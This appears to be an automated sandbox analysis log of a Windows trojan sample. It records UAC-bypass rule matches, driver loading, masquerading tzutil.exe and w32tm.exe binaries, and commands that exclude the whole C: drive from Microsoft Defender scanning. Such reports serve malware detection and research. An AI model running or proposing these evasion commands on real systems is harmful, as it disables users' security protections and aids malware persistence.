                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, 00000000.00000000.1313942283.0000000000681000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenslookup.exej% vs SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeBinary or memory string: OriginalFilenamenslookup.exej% vs SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeDriver loaded: \Registry\Machine\System\CurrentControlSet\Services\N4nguGs_8188Jump to behavior
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 4.2.svchost.exe.1c3ddda0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeStatic PE information: Section: t2 ZLIB complexity 0.9930853074596774
                    Source: bS4Vs_8188.sys.8.drBinary string: \Device\Udp6\Device\Udp\Device\Tcp6\Device\Tcp
                    Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@22/19@2/6
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008C5D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey,8_2_008C5D7C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_004043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_004043D0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_0041DE90 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0041DE90
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeMutant created: \Sessions\1\BaseNamedObjects\{3FA0BA37-09C6-4551-AE7D-90F1279DF03F}
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeMutant created: \Sessions\1\BaseNamedObjects\{332F5D59-2BCB-4D58-B258-019647CFE541}
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeMutant created: \Sessions\1\BaseNamedObjects\{3309A6B4-2F09-4BC8-A971-5D5A3B1B34EE}
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeMutant created: \Sessions\1\BaseNamedObjects\{BECD724E-BB45-47CB-82D8-31731BA1EB16}
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
                    Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\{213CD3BF-7EA5-4F3F-A371-F1D075B5EB25}
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeVirustotal: Detection: 64%
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeReversingLabs: Detection: 80%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe "C:\Users\user\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe "C:\Users\user\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
